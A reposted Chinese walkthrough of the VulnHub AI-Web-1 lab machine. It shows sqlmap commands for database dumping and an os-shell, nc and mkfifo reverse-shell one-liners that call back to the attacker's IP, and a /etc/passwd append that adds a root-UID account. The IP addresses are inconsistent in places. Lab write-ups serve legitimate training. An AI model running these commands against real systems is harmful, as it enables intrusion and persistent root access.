0


vulnhub——Ai-Web1靶机渗透

Ai-Web1靶机渗透

靶机下载:

官网地址:https://www.vulnhub.com/entry/ai-web-1,353/

攻击机:kali2024

一、信息收集

发下目标主机的IP为:192.168.201.141

用nmap工具扫描一下对方主机和服务

发现他打开了80端口

发现搜不到于是我们用工具去扫描一下

我们发现了两个目录,于是我们去访问一下

我们再去扫一下另一个路径,我们看到了一个php文件

二、sql注入

这里我们尝试一下是否存在sql注入

我们用burp抓一下包

这里我们知道了他要上传的地方,我们可以利用sqlmap进行脱库

sqlmap -u "http://192.168.201.141/se3reTdir777/" --data "uid=1&Operation=Submit" --dbs #列出库

sqlmap -u "http://192.168.201.141/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 --tables #列出表

sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 -T user --columns #列出字段

sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit" --level=3 --os-shell #

**选择

php(default)

custom location(s)

**

**输入获取到的绝对路径:

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

**

三、文件上传

首先我们写一个一句话木马

四、反弹shell

1、kali本地监听:nc -lvvp 6666(或者nc -lnvp)

2、蚁剑终端上nc反弹:nc -e /bin/bash 192.168.201.136 6666(发现-e参数不可用)

3、rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.201.141 6666 >/tmp/f

4、python -c "import pty;pty.spawn('/bin/bash')"(python写交互)

五、提权

searchsploit linux kernel 4.15.0-58-generic 搜一下相关的内核漏洞发现没有可以利用的 文件

openssl passwd -1 -salt admin 123456

echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /etc/passwd

标签: 网络 web安全

本文转载自: https://blog.csdn.net/qq_63034068/article/details/140548767
版权归原作者 生活的高手☆ 所有, 如有侵权,请联系我们删除。

“vulnhub——Ai-Web1靶机渗透”的评论:

还没有评论